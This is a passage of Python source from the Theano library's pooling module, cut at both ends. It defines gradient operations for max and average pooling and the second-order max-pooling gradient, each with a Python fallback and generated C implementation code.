                    "You can't provide a tuple value to both 'ws' and 'ds'."
                    " Please provide a value only to 'ws'."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'ds' parameter in PoolGrad is not going"
                    " to exist anymore as it is going to be replaced by the"
                    " parameter 'ws'.",
                    stacklevel=2
                )
                ws = ds
        elif ds is None and ws is None:
            raise ValueError(
                "You must provide a tuple value for the window size."
            )
        if st is not None:
            if stride is not None:
                raise ValueError(
                    "You can't provide a tuple value to both 'st and 'stride'."
                    " Please provide a value only to 'stride'."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'st' parameter in PoolGrad is not going"
                    " to exist anymore as it is going to be replaced by the"
                    " parameter 'stride'.",
                    stacklevel=2
                )
                stride = st
        if padding is not None:
            if pad is not None:
                raise ValueError(
                    "You can't provide a tuple value to both 'padding' and pad."
                    " Please provide a value only to pad."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'padding' parameter in PoolGrad is not"
                    " going to exist anymore as it is going to be replaced"
                    " by the parameter 'pad'.",
                    stacklevel=2
                )
                pad = padding
        if len(imgshape) < ndim:
            raise TypeError('imgshape must have at least {} dimensions'.format(ndim))
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * ndim
        # Padded size of each pooled dimension.
        patch_shape = tuple(tensor.extract_constant(imgshape[-ndim + i]) + pad[i] * 2
                            for i in xrange(ndim))

        def compute_out(v, downsample, stride):
            # Output length of one pooled dimension, symbolic or concrete.
            # NOTE(review): unlike Pool.out_shape, the ignore_border branch
            # has no `downsample == stride` fast path — presumably
            # equivalent for valid inputs; confirm before unifying.
            if ignore_border:
                out = (v - downsample) // stride + 1
                if isinstance(out, theano.Variable):
                    return tensor.maximum(out, 0)
                else:
                    return np.maximum(out, 0)
            else:
                if isinstance(v, theano.Variable):
                    return tensor.switch(tensor.ge(stride, downsample),
                                         (v - 1) // stride + 1,
                                         tensor.maximum(0, (v - 1 - downsample) //
                                                        stride + 1) + 1)
                elif stride >= downsample:
                    return (v - 1) // stride + 1
                else:
                    return max(0, (v - 1 - downsample) // stride + 1) + 1

        out_shape = [compute_out(patch_shape[i], ws[i], stride[i]) for i in xrange(ndim)]
        rval = list(imgshape[:-ndim]) + out_shape
        return rval

    def __init__(self, ignore_border, mode='max', ndim=2, openmp=None):
        self.ndim = ndim
        self.ignore_border = ignore_border
        # 'max_deterministic' is a historical alias of 'max'.
        if mode == 'max_deterministic':
            mode = 'max'
        if mode not in ['max', 'sum', 'average_inc_pad', 'average_exc_pad']:
            raise ValueError(
                "Pool mode parameter only support 'max', 'sum',"
                " 'average_inc_pad' and 'average_exc_pad'. Got %s" % mode)
        self.mode = mode
        super(PoolGrad, self).__init__(openmp=openmp)

    def prepare_node(self, node, storage_map, compute_map, impl):
        # Backward-compatibility shim: old pickles stored ds/st/padding on
        # the Op instead of passing them as inputs; append them as constant
        # inputs so the rest of the machinery sees the new signature.
        if len(node.inputs) < 5:
            self.ndim = len(node.op.ds)
            self.mode = node.op.mode
            ws = theano.tensor.constant(node.op.ds)
            st = theano.tensor.constant(node.op.st)
            pad = theano.tensor.constant(node.op.padding)
            node.inputs.append(ws)
            node.inputs.append(st)
            node.inputs.append(pad)
            if isinstance(ws, theano.Constant):
                storage_map[ws] = [ws.data]
                compute_map[ws] = [True]
            else:
                storage_map[ws] = [None]
                compute_map[ws] = [False]
            if isinstance(st, theano.Constant):
                storage_map[st] = [st.data]
                compute_map[st] = [True]
            else:
                storage_map[st] = [None]
                compute_map[st] = [False]
            if isinstance(pad, theano.Constant):
                storage_map[pad] = [pad.data]
                compute_map[pad] = [True]
            else:
                storage_map[pad] = [None]
                compute_map[pad] = [False]

    def infer_shape(self, node, in_shapes):
        # The gradient has the same shape as the (first) input tensor.
        return [in_shapes[0]]
class MaxPoolGrad(PoolGrad):
    """Gradient of max pooling.

    Routes each output gradient back to every input position inside the
    pooling region whose value equals the regional maximum.
    """

    def __init__(self, ignore_border, ndim=2, openmp=None):
        PoolGrad.__init__(self, ignore_border, mode='max', ndim=ndim, openmp=openmp)

    def make_node(self, x, maxout, gz, ws, stride=None, pad=None):
        """Build the Apply node for inputs (x, maxout, gz, ws, stride, pad)."""
        # make_node should only be called by the grad function of
        # Pool, so these asserts should not fail.
        x = tensor.as_tensor_variable(x)
        maxout = tensor.as_tensor_variable(maxout)
        gz = tensor.as_tensor_variable(gz)
        nd = self.ndim
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * nd
        ws = tensor.as_tensor_variable(ws)
        stride = tensor.as_tensor_variable(stride)
        pad = tensor.as_tensor_variable(pad)
        assert isinstance(x, Variable) and x.ndim >= nd
        assert isinstance(maxout, Variable) and maxout.ndim >= nd
        assert isinstance(gz, Variable) and gz.ndim >= nd
        assert isinstance(ws, Variable) and ws.ndim == 1
        assert isinstance(stride, Variable) and stride.ndim == 1
        assert isinstance(pad, Variable) and pad.ndim == 1
        assert x.ndim == maxout.ndim == gz.ndim >= nd
        if ws.dtype not in tensor.int_dtypes:
            raise TypeError('Pool downsample parameters must be ints.')
        if stride.dtype not in tensor.int_dtypes:
            raise TypeError('Stride parameters must be ints.')
        if pad.dtype not in tensor.int_dtypes:
            raise TypeError('Padding parameters must be ints.')
        return Apply(self, [x, maxout, gz, ws, stride, pad], [x.type()])

    def perform(self, node, inp, out):
        """Python fallback: accumulate gz into every argmax position."""
        assert self.mode == 'max'
        x, maxout, gz, ws, stride, pad = inp
        gx_stg, = out
        nd = self.ndim
        assert ws.shape == stride.shape == pad.shape == (nd,)
        if len(x.shape) < nd:
            raise NotImplementedError(
                'MaxPoolGrad requires input with {} or more dimensions'.format(nd))
        pool_out_shp = maxout.shape[-nd:]
        img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))

        # pad the image
        if max(pad) != 0:
            y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
            y[(slice(None),) * (len(x.shape) - nd) +
              tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
        else:
            y = x
        gx = np.zeros_like(y)

        # precompute the region boundaries for each dimension
        region_ranges = [[] for i in xrange(nd)]
        for i in xrange(nd):
            for j in xrange(pool_out_shp[i]):
                start = builtins.max(j * stride[i], pad[i])
                end = builtins.min(start + ws[i], img_shp[i])
                region_ranges[i].append(xrange(start, end))

        # iterate over non-pooling dimensions
        for k in np.ndindex(*x.shape[:-nd]):
            gxk = gx[k]
            gzk = gz[k]
            yk = y[k]
            maxoutk = maxout[k]
            # iterate over pooling regions
            for r in np.ndindex(*pool_out_shp):
                maxout_value = maxoutk[r]
                # iterate inside region; every position matching the max
                # receives the gradient (ties all get it)
                for c in itertools.product(*[region_ranges[i][r[i]]
                                             for i in xrange(nd)]):
                    if maxout_value == yk[c]:
                        gxk[c] += gzk[r]

        # unpad the image
        gx = gx[(slice(None),) * (len(x.shape) - nd) +
                tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))]
        gx_stg[0] = gx

    def grad(self, inp, grads):
        x, maxout, gz, ws, stride, pad = inp
        ggx, = grads
        # ws/stride/pad are integer parameters: disconnected from the cost.
        return ([theano.tensor.zeros_like(x),
                 theano.tensor.zeros_like(maxout),
                 DownsampleFactorMaxGradGrad(ndim=self.ndim,
                                             ignore_border=self.ignore_border)(
                                                 x, maxout, ggx, ws, stride, pad)] +
                [DisconnectedType()() for i in inp[3:]])

    def connection_pattern(self, node):
        # Output depends on x, maxout and gz, not on ws/stride/pad.
        return [[1], [1], [1], [0], [0], [0]]

    def c_code(self, node, name, inp, out, sub):
        """Generate the C implementation (same algorithm as perform)."""
        assert self.mode == 'max'
        x, z, gz, ws, stride, pad = inp
        gx, = out
        nd = self.ndim
        total_ndim = node.inputs[0].ndim
        non_pool_ndim = total_ndim - nd
        fail = sub['fail']

        if self.openmp:
            # run in parallel over each pooling block
            # NOTE: this string literal was truncated by a comment-stripping
            # pass (it begins with '#'); restored from upstream Theano.
            omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, maximum) schedule(static)'
        else:
            omp_parallel = ''
        ccode = """
        // sanity checks
        int x_typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
        int z_typenum = PyArray_ObjectType((PyObject*)%(z)s, 0);
        int gz_typenum = PyArray_ObjectType((PyObject*)%(gz)s, 0);
        if ((x_typenum != z_typenum) || (x_typenum != gz_typenum))
        {
            PyErr_SetString(PyExc_ValueError, "input types must all match");
            %(fail)s;
        }
        if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_NDIM(%(z)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "z must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_NDIM(%(gz)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "gz must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
            %(fail)s;
        }
        int z[%(nd)s]; // shape of the output
        int r[%(nd)s]; // shape of the padded_input
        int ws[%(nd)s];
        int st[%(nd)s];
        int pd[%(nd)s];
        int nonzero_padding;
        nonzero_padding = 0;
        for (int i=0; i<%(nd)s; i++)
        {
            ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
            st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
            pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
            z[i] = PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i];
            r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
            if (pd[i]>0)
                nonzero_padding = 1;
        }
        // allocating memory for output, if necessary
        int mem_nec;
        mem_nec = 0;
        if ((!%(gx)s) || !PyArray_ISCONTIGUOUS(%(gx)s)
            || *PyArray_DIMS(%(gx)s)!=%(total_ndim)s)
        {
            mem_nec = 1;
        }
        if (!mem_nec)
        {
            for (int i=0; i<%(total_ndim)s; i++)
            {
                if (PyArray_DIMS(%(gx)s)[i] != PyArray_DIMS(%(x)s)[i])
                {
                    mem_nec = 1;
                    break;
                }
            }
        }
        if (mem_nec)
        {
            Py_XDECREF(%(gx)s);
            %(gx)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(x)s), x_typenum,0);
        }
        else {
            PyArray_FILLWBYTE(%(gx)s, 0);
        }
        dtype_%(z)s maximum; // temp var for maximum value in a region
        int z_prod;
        // do not run if any z[i] is zero
        z_prod = 1;
        for (int i=0; i<%(nd)s; i++)
        {
            z_prod *= z[i];
        }
        if (z_prod)
        {
            // will be used to hold start and end index of a region
            int r_st[%(nd)s];
            int r_end[%(nd)s];
            // index for iterating over the pooling regions
            int r_idx[%(nd)s];
            // placeholder for PyArray indexing (output)
            npy_intp o_idx[%(total_ndim)s];
            // placeholder for PyArray indexing (input)
            npy_intp i_idx[%(total_ndim)s];
            // loop over non-pooling dimensions
            int non_pooling_prod = 1;
            for (int i=0; i<%(non_pool_ndim)s; i++)
            {
                non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
            }
            %(omp_parallel)s
            // first loop over non-pooling dimensions
            for (int t=0; t<non_pooling_prod; t++)
            {
                // compute the non-pooling index in each dimension
                if (%(non_pool_ndim)s!=0)
                {
                    o_idx[0] = t;
                    i_idx[0] = t;
                    for (int i=1; i<%(non_pool_ndim)s; i++)
                    {
                        o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
                        o_idx[i - 1] =o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
                        i_idx[i] = o_idx[i];
                        i_idx[i - 1] = o_idx[i - 1];
                    }
                }

                // then loop over each region in each pooling dimension
        """

        for i in xrange(nd):
            ccode += """
                for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
                  r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
                  r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
                  // skip the padding
                  r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
                  r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
                  // from padded_img space to img space
                  r_st[%(i)s] -= pd[%(i)s];
                  r_end[%(i)s] -= pd[%(i)s];
                  // use the index to find the correct position in the output
                  o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)

        ccode += """
                  dtype_%(gz)s * gz;
                  if (%(total_ndim)s == 4)
                  {
                    // the maximum value
                    maximum = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])))[0];
                    // the gradient corresponding to this maximum value in z
                    gz = ((dtype_%(gz)s*)(PyArray_GETPTR4(%(gz)s, o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
                  }
                  else
                  {
                    // the maximum value
                    maximum = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s,o_idx)))[0];
                    // the gradient corresponding to this maximum value in z
                    gz = ((dtype_%(gz)s*)(PyArray_GetPtr(%(gz)s, o_idx)));
                  }
        """
        for i in xrange(nd):
            ccode += """
                  // go through the pooled region in the unpadded input
                  for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
                  {
                    i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)
        ccode += """
                    dtype_%(x)s a;
                    dtype_%(gx)s * gx;
                    if (%(total_ndim)s == 4)
                    {
                      a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
                      gx = ((dtype_%(gx)s*)(PyArray_GETPTR4(%(gx)s, i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
                    }
                    else
                    {
                      a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
                      gx = ((dtype_%(gx)s*)(PyArray_GetPtr(%(gx)s, i_idx)));
                    }
                    if (a == maximum){
                      gx[0] = gx[0] + gz[0];
                    }
        """
        for i in xrange(nd):
            ccode += """
                  } // for loop over region
            """
        for i in xrange(nd):
            ccode += """
                } // loop over pooling dimension
            """

        ccode += """
            } // for loop over non-pooling dimensions
        } // if z_prod
        """
        return ccode % locals()

    def c_code_cache_version(self):
        return (0, 10, self.openmp)
class AveragePoolGrad(PoolGrad):
    """Gradient of sum/average pooling.

    Each output gradient is spread uniformly (divided by the region
    size, except in 'sum' mode) over the input positions of its region.
    """

    # ignore_border is used for perform, but not c code. No need in params_type
    def __init__(self, ignore_border, mode='average_inc_pad', ndim=2):
        assert mode in ['sum', 'average_inc_pad', 'average_exc_pad']
        PoolGrad.__init__(self, ignore_border, mode, ndim)

    # There is an extra dummy parameter to match the parameter count
    # of MaxPoolGrad. They have to keep the same interface because of
    # the DownsampleFactorMaxGrad trick to keep old scripts working
    # (see downsample.py for details on this).
    def make_node(self, x, gz, ws, stride=None, pad=None, dummy=None):
        """Build the Apply node for inputs (x, gz, ws, stride, pad)."""
        # make_node should only be called by the grad function of
        # Pool, so these asserts should not fail.
        x = tensor.as_tensor_variable(x)
        gz = tensor.as_tensor_variable(gz)
        nd = self.ndim
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * nd
        ws = tensor.as_tensor_variable(ws)
        stride = tensor.as_tensor_variable(stride)
        pad = tensor.as_tensor_variable(pad)
        assert isinstance(x, Variable) and x.ndim >= nd
        assert isinstance(gz, Variable) and gz.ndim >= nd
        assert isinstance(ws, Variable) and ws.ndim == 1
        assert isinstance(stride, Variable) and stride.ndim == 1
        assert x.ndim == gz.ndim >= nd
        assert isinstance(pad, Variable) and pad.ndim == 1
        if ws.dtype not in tensor.int_dtypes:
            raise TypeError('Pool downsample parameters must be ints.')
        if stride.dtype not in tensor.int_dtypes:
            raise TypeError('Stride parameters must be ints.')
        if pad.dtype not in tensor.int_dtypes:
            raise TypeError('Padding parameters must be ints.')
        return Apply(self, [x, gz, ws, stride, pad], [x.type()])

    def perform(self, node, inp, out):
        """Python fallback: spread gz uniformly over each pooling region."""
        x, gz, ws, stride, pad = inp
        gx_stg, = out
        nd = self.ndim
        assert ws.shape == stride.shape == pad.shape == (nd,)
        if len(x.shape) < nd:
            raise NotImplementedError(
                'AveragePoolGrad requires input with {} or more dimensions'.format(nd))
        if self.mode == 'average_exc_pad' and max(pad) != 0:
            raise NotImplementedError()
        z_shape = self.out_shape(x.shape, ws, self.ignore_border, stride, pad, nd)
        if (gx_stg[0] is None) or (gx_stg[0].shape != z_shape):
            gx_stg[0] = np.empty(z_shape, dtype=x.dtype)
        zz = gx_stg[0]
        # size of pooling output
        pool_out_shp = zz.shape[-nd:]
        img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
        inc_pad = self.mode == 'average_inc_pad'
        sum_mode = self.mode == 'sum'

        # initialize the padded output
        gx = np.zeros((x.shape[:-nd] + img_shp), dtype=x.dtype)

        # precompute the region boundaries and sizes for each dimension
        region_slices = [[] for i in xrange(nd)]
        region_sizes = [[] for i in xrange(nd)]
        for i in xrange(nd):
            for j in xrange(pool_out_shp[i]):
                if sum_mode or inc_pad:
                    start = j * stride[i]
                else:
                    # average_exc_pad: regions never cover the padding
                    start = builtins.max(j * stride[i], pad[i])
                end = builtins.min(start + ws[i], img_shp[i])
                region_slices[i].append(slice(start, end))
                region_sizes[i].append(end - start)

        # iterate over non-pooling dimensions
        region_slice = [None] * nd
        for k in np.ndindex(*x.shape[:-nd]):
            gzk = gz[k]
            gxk = gx[k]
            # iterate over pooling regions
            for r in np.ndindex(*pool_out_shp):
                region_size = 1
                for i in xrange(nd):
                    region_slice[i] = region_slices[i][r[i]]
                    region_size *= region_sizes[i][r[i]]
                if sum_mode:
                    val = gzk[r]
                else:
                    # divide by region size
                    val = gzk[r] / region_size
                gxk[region_slice] += val

        # unpad the image
        gx = gx[(slice(None),) * (len(x.shape) - nd) +
                tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))]
        gx_stg[0] = gx

    def grad(self, inp, grads):
        x, gz, ws, stride, pad = inp
        ggx, = grads
        # The second derivative of average pooling is average pooling of
        # the incoming gradient; ws/stride/pad are disconnected.
        return ([theano.tensor.zeros_like(x),
                 Pool(ignore_border=self.ignore_border,
                      ndim=self.ndim, mode=self.mode)(ggx,
                                                      ws, stride, pad)] + [DisconnectedType()() for i in inp[2:]])

    def connection_pattern(self, node):
        # Output depends on x and gz, not on ws/stride/pad.
        return [[1], [1], [0], [0], [0]]

    def c_code(self, node, name, inp, out, sub):
        """Generate the C implementation (same algorithm as perform)."""
        x, gz, ws, stride, pad = inp
        gx, = out
        nd = self.ndim
        total_ndim = node.inputs[0].ndim
        non_pool_ndim = total_ndim - nd
        fail = sub['fail']
        inc_pad = int(self.mode == 'average_inc_pad')
        sum_mode = int(self.mode == 'sum')

        if self.openmp:
            # run in parallel over each pooling block
            # NOTE: this string literal was truncated by a comment-stripping
            # pass (it begins with '#'); restored from upstream Theano.
            omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_pad_width, r_idx, i_idx, o_idx) schedule(static)'
        else:
            omp_parallel = ''
        ccode = """
        // sanity checks
        int x_typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
        int gz_typenum = PyArray_ObjectType((PyObject*)%(gz)s, 0);
        if (x_typenum != gz_typenum)
        {
            PyErr_SetString(PyExc_ValueError, "input types must all match");
            %(fail)s;
        }
        if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_NDIM(%(gz)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "gz must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
            %(fail)s;
        }
        int z[%(nd)s]; // shape of the output
        int r[%(nd)s]; // shape of the padded_input
        int ws[%(nd)s];
        int st[%(nd)s];
        int pd[%(nd)s];
        int nonzero_padding;
        nonzero_padding = 0;
        for (int i=0; i<%(nd)s; i++)
        {
            ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
            st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
            pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
            z[i] = PyArray_DIMS(%(gz)s)[%(non_pool_ndim)s + i];
            r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
            if (pd[i]>0)
                nonzero_padding = 1;
        }
        if (!%(inc_pad)s && !%(sum_mode)s && nonzero_padding)
        {
            PyErr_SetString(PyExc_ValueError,
              "padding must be zero for average_exc_pad");
            %(fail)s;
        }
        // allocating memory for output, if necessary
        int mem_nec;
        mem_nec = 0;
        if ((!%(gx)s) || !PyArray_ISCONTIGUOUS(%(gx)s)
            || *PyArray_DIMS(%(gx)s)!=%(total_ndim)s)
        {
            mem_nec = 1;
        }
        if (!mem_nec)
        {
            for (int i=0; i<%(total_ndim)s; i++)
            {
                if (PyArray_DIMS(%(gx)s)[i] != PyArray_DIMS(%(x)s)[i])
                {
                    mem_nec = 1;
                    break;
                }
            }
        }
        if (mem_nec)
        {
            Py_XDECREF(%(gx)s);
            %(gx)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(x)s), x_typenum,0);
        }
        else {
            PyArray_FILLWBYTE(%(gx)s, 0);
        }
        int z_prod;
        // do not run if any z[i] is zero
        z_prod = 1;
        for (int i=0; i<%(nd)s; i++)
        {
            z_prod *= z[i];
        }
        if (z_prod)
        {
            // will be used to hold start and end index of a region
            int r_st[%(nd)s];
            int r_end[%(nd)s];
            // padded region size
            int r_pad_width[%(nd)s];
            // index for iterating over the pooling regions
            int r_idx[%(nd)s];
            // placeholder for PyArray indexing (output)
            npy_intp o_idx[%(total_ndim)s];
            // placeholder for PyArray indexing (input)
            npy_intp i_idx[%(total_ndim)s];
            // loop over non-pooling dimensions
            int non_pooling_prod = 1;
            for (int i=0; i<%(non_pool_ndim)s; i++)
            {
                non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
            }
            %(omp_parallel)s
            // first loop over non-pooling dimensions
            for (int t=0; t<non_pooling_prod; t++)
            {
                // compute the non-pooling index in each dimension
                if (%(non_pool_ndim)s!=0)
                {
                    o_idx[0] = t;
                    i_idx[0] = t;
                    for (int i=1; i<%(non_pool_ndim)s; i++)
                    {
                        o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
                        o_idx[i - 1] =o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
                        i_idx[i] = o_idx[i];
                        i_idx[i - 1] = o_idx[i - 1];
                    }
                }

                // then loop over each region in each pooling dimension
        """

        for i in xrange(nd):
            ccode += """
                for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
                  r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
                  if (!%(sum_mode)s && !%(inc_pad)s && r_st[%(i)s] < pd[%(i)s])
                  {
                    r_st[%(i)s] = pd[%(i)s];
                  }
                  r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
                  r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
                  r_pad_width[%(i)s] = r_end[%(i)s] - r_st[%(i)s];
                  // from padded_img space to img space
                  r_st[%(i)s] = r_st[%(i)s] - pd[%(i)s] > 0 ? r_st[%(i)s] - pd[%(i)s] : 0;
                  r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] - pd[%(i)s] ? r[%(i)s] - 2 * pd[%(i)s] : r_end[%(i)s] - pd[%(i)s];
                  // use the index to find the correct position in the output
                  o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
            """ % dict(i=i, sum_mode=sum_mode, inc_pad=inc_pad, non_pool_ndim=non_pool_ndim)

        ccode += """
                  dtype_%(gz)s * gz;
                  dtype_%(gz)s val;
                  if (%(total_ndim)s == 4)
                  {
                    // the gradient for this region
                    gz = ((dtype_%(gz)s*)(PyArray_GETPTR4(%(gz)s, o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
                  }
                  else
                  {
                    // the gradient for this region
                    gz = ((dtype_%(gz)s*)(PyArray_GetPtr(%(gz)s, o_idx)));
                  }
                  // compute the contribution
                  if (%(sum_mode)s)
                  {
                    val = gz[0];
                  }
                  else
                  {
                    val = gz[0] / (%(region_size)s);
                  }
        """
        region_size = ' * '.join('r_pad_width[%d]' % i for i in xrange(nd))
        for i in xrange(nd):
            ccode += """
                  // go through the pooled region in the unpadded input
                  for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
                  {
                    i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)
        ccode += """
                    dtype_%(gx)s * gx;
                    if (%(total_ndim)s == 4)
                    {
                      gx = ((dtype_%(gx)s*)(PyArray_GETPTR4(%(gx)s, i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
                    }
                    else
                    {
                      gx = ((dtype_%(gx)s*)(PyArray_GetPtr(%(gx)s, i_idx)));
                    }
                    gx[0] = gx[0] + val;
        """
        for i in xrange(nd):
            ccode += """
                  } // for loop over region
            """
        for i in xrange(nd):
            ccode += """
                } // loop over pooling dimension
            """

        ccode += """
            } // for loop over non-pooling dimensions
        } // if z_prod
        """
        return ccode % locals()

    def c_code_cache_version(self):
        return (0, 3, self.openmp)
class DownsampleFactorMaxGradGrad(OpenMPOp):
    """Second-order gradient of max pooling (R-op of MaxPoolGrad).

    Gathers, for each pooling region, the incoming gradient at the
    position(s) holding the regional maximum.
    """

    __props__ = ('ignore_border', 'mode', 'ndim')

    def __init__(self, ignore_border, mode='max', ndim=2, openmp=None):
        self.ndim = ndim
        self.ignore_border = ignore_border
        self.mode = mode
        super(DownsampleFactorMaxGradGrad, self).__init__(openmp=openmp)
        # Only max pooling has a meaningful grad-of-grad of this form.
        assert self.mode == 'max'

    def make_node(self, x, maxout, gz, ws, stride=None, pad=None):
        """Build the Apply node for inputs (x, maxout, gz, ws, stride, pad)."""
        # make_node should only be called by the grad function of
        # MaxPoolGrad, so these asserts should not fail.
        x = tensor.as_tensor_variable(x)
        maxout = tensor.as_tensor_variable(maxout)
        gz = tensor.as_tensor_variable(gz)
        nd = self.ndim
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * nd
        elif isinstance(pad, (tuple, list)):
            if max(pad) != 0 and not self.ignore_border:
                raise NotImplementedError(
                    'padding works only with ignore_border=True')
            if isinstance(ws, (tuple, list)):
                if any(pad[i] >= ws[i] for i in range(nd)):
                    raise NotImplementedError(
                        'padding must be smaller than strides')
        ws = tensor.as_tensor_variable(ws)
        stride = tensor.as_tensor_variable(stride)
        pad = tensor.as_tensor_variable(pad)
        assert ws.ndim == 1
        assert stride.ndim == 1
        assert pad.ndim == 1
        assert x.ndim == maxout.ndim == gz.ndim >= nd
        if ws.dtype not in tensor.int_dtypes:
            raise TypeError('Pool downsample parameters must be ints.')
        if stride.dtype not in tensor.int_dtypes:
            raise TypeError('Stride parameters must be ints.')
        if pad.dtype not in tensor.int_dtypes:
            raise TypeError('Padding parameters must be ints.')
        return Apply(self, [x, maxout, gz, ws, stride, pad], [x.type()])

    def perform(self, node, inp, out):
        """Python fallback: accumulate ggx from every argmax position."""
        x, maxout, ggx, ws, stride, pad = inp
        z, = out
        nd = self.ndim
        assert ws.shape == stride.shape == pad.shape == (nd,)
        if len(x.shape) < nd:
            raise NotImplementedError(
                'DownsampleFactorMaxGradGrad requires input '
                'with {} or more dimensions'.format(nd))
        if (z[0] is None) or (z[0].shape != maxout.shape):
            z[0] = np.zeros(maxout.shape, dtype=x.dtype)
        ggz = z[0]  # grad wrt maxout_grad has the same shape as maxout
        # size of pooling output
        pool_out_shp = ggz.shape[-nd:]
        img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))

        # pad the image and its gradients
        if max(pad) > 0:
            y_padded = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
            y_padded[(slice(None),) * (len(x.shape) - nd) +
                     tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
            ggx_padded = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
            ggx_padded[(slice(None),) * (len(x.shape) - nd) +
